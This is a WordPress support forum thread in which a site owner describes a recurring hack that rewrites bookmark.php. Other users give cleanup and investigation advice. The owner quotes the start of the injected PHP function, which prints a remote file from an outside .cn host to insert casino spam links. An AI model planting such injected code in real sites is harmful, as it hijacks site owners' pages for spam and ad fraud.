Title: bookmark.php exploit Last modified: August 19, 2016 --- # bookmark.php exploit * [brsilver](https://wordpress.org/support/users/brsilver/) * (@brsilver) * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/) * My site has been hacked and after I clean it up it comes back after a week or so. The exploit replaces bookmark.php with a new one that appends a script that begins function encoded_optimal(){print file_get_contents(‘[http://nadoelo.cn/baza2/21.txt’](http://nadoelo.cn/baza2/21.txt’););}… The file that is loaded contains hundreds of links to casino sites, and this causes all my Adsense ads to be casino ads. There may be other things it is doing but this is the most obvious. * I have not seen other references to this exploit, although if you google “nadoelo. cn” you will see dozens (maybe hundreds) of blogs where this script returns an error. So it must be very common. How to get rid of it once and for all. I have uploaded clean new everything, including plugins, checked db with Exploit Scanner, changed ftp password. Today I am trying removing write permission on bookmark. php. Viewing 3 replies - 1 through 3 (of 3 total) * [alism](https://wordpress.org/support/users/alism/) * (@alism) * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340168) * Might be worth scanning your own computer for malware, in case your FTP password is being stolen. * See if you can spot anything suspicious in your log files. Speak to your host too. The hack might be coming through another insecure script elsewhere on the server. * [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/) * (@rvoodoo) * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340175) * if you can look at your access logs, it could help. Look at the time bookmarks. php was changed, compare to access logs. * You may see that the file is changed using another file on your server. A file hidden away several folders deep that is giving access to your WP files. * [Aren Cambre](https://wordpress.org/support/users/novasource/) * (@novasource) * [16 years, 3 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340480) * I just helped a site with a similar problem, but **wp-blog-header.php** is what got hit on that site. * Sounds like WordPress has a security hole. * **wp-blog-header.php** should be 274 bytes but had ballooned to 106,708 bytes. Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘bookmark.php exploit’ is closed to new replies. ## Tags * [bookmark.php](https://wordpress.org/support/topic-tag/bookmark-php/) * [exploit](https://wordpress.org/support/topic-tag/exploit/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 3 replies * 4 participants * Last reply from: [Aren Cambre](https://wordpress.org/support/users/novasource/) * Last activity: [16 years, 3 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340480) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics